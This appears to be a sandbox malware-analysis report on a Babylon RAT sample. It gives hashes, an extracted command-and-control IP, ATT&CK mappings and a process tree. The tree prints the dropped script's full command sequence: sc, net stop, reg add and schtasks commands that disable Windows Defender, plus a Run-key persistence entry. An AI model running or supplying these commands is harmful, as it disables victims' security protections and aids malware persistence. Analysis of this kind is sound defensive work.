babylonrat | cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb

Analysis

max time kernel
146s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20240319-en
resource tags

arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system
submitted
09-04-2024 03:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe
Size

10.2MB
MD5

3b469784a485d1705edfd3196df0e1e5
SHA1

228467ee42bf0a6b32717b59932d7d61d6b08caf
SHA256

cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb
SHA512

28c0c4f2325d27d2615b80d94fc71dce7b5577ebd130e743d5ffa12c7f497c21e5cb61ab55275762ace80dcbdd44ca1535b984ee22785914020c8007c8a323bb
SSDEEP

196608:V7oSNqzagn5zuf5rTRqcYdXuxTumr3cBS8Si2NdDcnSoiThhryQvwnbL:VUSNC9Y5/NYEk6OXSlNFBJwbL

Score

10^/10

babylonrat evasion persistence trojan

Malware Config

Extracted

Family

babylonrat

175.209.69.173

Signatures

Babylon RAT
Babylon RAT is remote access trojan written in C++.
trojan babylonrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 8 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe

Executes dropped EXE 3 IoCs

pid	Process
3176	oracleserver.exe
2772	oracleserver.exe
2336	oracleserver.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OracleInc = "C:\\ProgramData\\OracleInc\\oracleserver.exe"	oracleserver.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OracleInc = "C:\\ProgramData\\OracleInc\\oracleserver.exe"	oracleserver.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OracleInc = "C:\\ProgramData\\OracleInc\\oracleserver.exe"	oracleserver.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
920	sc.exe
4376	sc.exe
2992	sc.exe
3824	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000_Classes\Local Settings	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe
Key created	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000_Classes\Local Settings	OpenWith.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3176	oracleserver.exe
3176	oracleserver.exe
2772	oracleserver.exe
2772	oracleserver.exe
2336	oracleserver.exe
2336	oracleserver.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2772	oracleserver.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3176	oracleserver.exe
Token: SeDebugPrivilege	3176	oracleserver.exe
Token: SeTcbPrivilege	3176	oracleserver.exe
Token: SeShutdownPrivilege	2772	oracleserver.exe
Token: SeDebugPrivilege	2772	oracleserver.exe
Token: SeTcbPrivilege	2772	oracleserver.exe
Token: SeShutdownPrivilege	2336	oracleserver.exe
Token: SeDebugPrivilege	2336	oracleserver.exe
Token: SeTcbPrivilege	2336	oracleserver.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1992	OpenWith.exe
2772	oracleserver.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4276 wrote to memory of 3048	4276	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe	98
PID 4276 wrote to memory of 3048	4276	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe	98
PID 4276 wrote to memory of 3048	4276	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe	98
PID 3048 wrote to memory of 920	3048	cmd.exe	102
PID 3048 wrote to memory of 920	3048	cmd.exe	102
PID 3048 wrote to memory of 920	3048	cmd.exe	102
PID 3048 wrote to memory of 1760	3048	cmd.exe	139
PID 3048 wrote to memory of 1760	3048	cmd.exe	139
PID 3048 wrote to memory of 1760	3048	cmd.exe	139
PID 1760 wrote to memory of 4240	1760	net.exe	123
PID 1760 wrote to memory of 4240	1760	net.exe	123
PID 1760 wrote to memory of 4240	1760	net.exe	123
PID 4276 wrote to memory of 3176	4276	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe	105
PID 4276 wrote to memory of 3176	4276	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe	105
PID 4276 wrote to memory of 3176	4276	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe	105
PID 3048 wrote to memory of 4376	3048	cmd.exe	129
PID 3048 wrote to memory of 4376	3048	cmd.exe	129
PID 3048 wrote to memory of 4376	3048	cmd.exe	129
PID 4276 wrote to memory of 3152	4276	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe	107
PID 4276 wrote to memory of 3152	4276	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe	107
PID 4276 wrote to memory of 3152	4276	cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe	107
PID 3048 wrote to memory of 1048	3048	cmd.exe	108
PID 3048 wrote to memory of 1048	3048	cmd.exe	108
PID 3048 wrote to memory of 1048	3048	cmd.exe	108
PID 1048 wrote to memory of 3272	1048	net.exe	109
PID 1048 wrote to memory of 3272	1048	net.exe	109
PID 1048 wrote to memory of 3272	1048	net.exe	109
PID 3048 wrote to memory of 2992	3048	cmd.exe	132
PID 3048 wrote to memory of 2992	3048	cmd.exe	132
PID 3048 wrote to memory of 2992	3048	cmd.exe	132
PID 3048 wrote to memory of 5080	3048	cmd.exe	140
PID 3048 wrote to memory of 5080	3048	cmd.exe	140
PID 3048 wrote to memory of 5080	3048	cmd.exe	140
PID 5080 wrote to memory of 4584	5080	net.exe	112
PID 5080 wrote to memory of 4584	5080	net.exe	112
PID 5080 wrote to memory of 4584	5080	net.exe	112
PID 3048 wrote to memory of 3824	3048	cmd.exe	113
PID 3048 wrote to memory of 3824	3048	cmd.exe	113
PID 3048 wrote to memory of 3824	3048	cmd.exe	113
PID 3048 wrote to memory of 2724	3048	cmd.exe	114
PID 3048 wrote to memory of 2724	3048	cmd.exe	114
PID 3048 wrote to memory of 2724	3048	cmd.exe	114
PID 2724 wrote to memory of 1940	2724	net.exe	115
PID 2724 wrote to memory of 1940	2724	net.exe	115
PID 2724 wrote to memory of 1940	2724	net.exe	115
PID 3048 wrote to memory of 1324	3048	cmd.exe	116
PID 3048 wrote to memory of 1324	3048	cmd.exe	116
PID 3048 wrote to memory of 1324	3048	cmd.exe	116
PID 3048 wrote to memory of 2348	3048	cmd.exe	117
PID 3048 wrote to memory of 2348	3048	cmd.exe	117
PID 3048 wrote to memory of 2348	3048	cmd.exe	117
PID 3048 wrote to memory of 2492	3048	cmd.exe	118
PID 3048 wrote to memory of 2492	3048	cmd.exe	118
PID 3048 wrote to memory of 2492	3048	cmd.exe	118
PID 3048 wrote to memory of 2772	3048	cmd.exe	136
PID 3048 wrote to memory of 2772	3048	cmd.exe	136
PID 3048 wrote to memory of 2772	3048	cmd.exe	136
PID 3048 wrote to memory of 4828	3048	cmd.exe	120
PID 3048 wrote to memory of 4828	3048	cmd.exe	120
PID 3048 wrote to memory of 4828	3048	cmd.exe	120
PID 3048 wrote to memory of 3324	3048	cmd.exe	121
PID 3048 wrote to memory of 3324	3048	cmd.exe	121
PID 3048 wrote to memory of 3324	3048	cmd.exe	121
PID 3048 wrote to memory of 2616	3048	cmd.exe	122

C:\Users\Admin\AppData\Local\Temp\cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe
"C:\Users\Admin\AppData\Local\Temp\cbc5c9ebce50216b6f5ef73e545b317b86e20423212f29733b5d032596be00eb.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Def_off.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Windows\SysWOW64\sc.exe
    sc config Sense start= disabled
    3⤵
    - Launches sc.exe
    PID:920
- - C:\Windows\SysWOW64\net.exe
    net stop Sense
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1760
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Sense
      4⤵
      PID:4240
- - C:\Windows\SysWOW64\sc.exe
    sc config WdFilter start= disabled
    3⤵
    - Launches sc.exe
    PID:4376
- - C:\Windows\SysWOW64\net.exe
    net stop WdFilter
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WdFilter
      4⤵
      PID:3272
- - C:\Windows\SysWOW64\sc.exe
    sc config WdNisSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:2992
- - C:\Windows\SysWOW64\net.exe
    net stop WdNisSvc Track
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WdNisSvc Track
      4⤵
      PID:4584
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:3824
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:1940
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:2348
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:2772
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:4828
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3512
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4608
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2220
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4376
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d 0 /f
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d 0 /f
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d 0 /f
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
    3⤵
    PID:3348
- C:\Users\Admin\AppData\Local\Temp\oracleserver.exe
  "C:\Users\Admin\AppData\Local\Temp\oracleserver.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3176
- - C:\ProgramData\OracleInc\oracleserver.exe
    "C:\ProgramData\OracleInc\oracleserver.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2772
  - - C:\ProgramData\OracleInc\oracleserver.exe
      "C:\ProgramData\OracleInc\oracleserver.exe" 2772
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2336
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\del.vbs"
  2⤵
  PID:3152

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1992

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:5080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4104 --field-trial-handle=2228,i,8155065313278028490,17854605419281052753,262144 --variations-seed-version /prefetch:8
1⤵
PID:5980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Def_off.cmd

Filesize
2KB

MD5
7e1105b6b22ea8685d836a0315ebd27b

SHA1
a8588b878ab15b8f74d129f6a0d6edfee8c202d5

SHA256
75dacc04526bcc4f5e3a31109a1a5c534082b72df6824f8498b24849aba2e655

SHA512
f4663bfe1117ac56c47fe743ee1b4e95c0912fc6bf6a762a44134b3c3dce26eee21081d6c6eb75e925b541952283e8766d918c1e840572ec4f7815b05e1812d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\del.vbs

Filesize
644B

MD5
6b5174248e3ac313dae6b3ac958be2e6

SHA1
cfa6b347004145cf8744339f70ab41af9f1e3fd4

SHA256
71f5befbd43a1f3c242650c24f36618bea541d09cb733eeffeb81353cb861380

SHA512
df11f0c682c50c8d75a87e6aca449e1f54788c511b8a6cb080d899755b2c990c211a7e3c633f5b6903dc1e05a3398e3672cc4e178c405a3ed5f1fc36f2355a2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\oracleserver.exe

Filesize
10.1MB

MD5
86e6ca2678744229869b3d6ef0d52ed5

SHA1
09922524d1d30a08a6fd1da17bc2e288316406d3

SHA256
73321634971c0494584f0698de2021ca46432d9ade7ca062046b8d03633b6c17

SHA512
a0f55c6ac8f06c39682b677ae0ec491fc07a14824bab90256ae1425ead767cc7eb5cf9f42cdf617e6a8e524e55d38cd49641874c0c5bbf0dc6ebe711c1a16450

Download Submit
memory/2336-41-0x00000000007C0000-0x00000000017EA000-memory.dmp

Filesize
16.2MB

Download
memory/2336-46-0x00000000007C0000-0x00000000017EA000-memory.dmp

Filesize
16.2MB

Download
memory/2336-42-0x00000000007C0000-0x00000000017EA000-memory.dmp

Filesize
16.2MB

Download
memory/2336-40-0x0000000001D10000-0x0000000001D11000-memory.dmp

Filesize
4KB

Download
memory/2772-45-0x00000000007C0000-0x00000000017EA000-memory.dmp

Filesize
16.2MB

Download
memory/2772-34-0x0000000001C50000-0x0000000001C51000-memory.dmp

Filesize
4KB

Download
memory/2772-36-0x00000000007C0000-0x00000000017EA000-memory.dmp

Filesize
16.2MB

Download
memory/2772-35-0x00000000007C0000-0x00000000017EA000-memory.dmp

Filesize
16.2MB

Download
memory/3176-23-0x0000000000360000-0x000000000138A000-memory.dmp

Filesize
16.2MB

Download
memory/3176-33-0x0000000000360000-0x000000000138A000-memory.dmp

Filesize
16.2MB

Download
memory/3176-26-0x0000000000360000-0x000000000138A000-memory.dmp

Filesize
16.2MB

Download
memory/3176-22-0x00000000013F0000-0x00000000013F1000-memory.dmp

Filesize
4KB

Download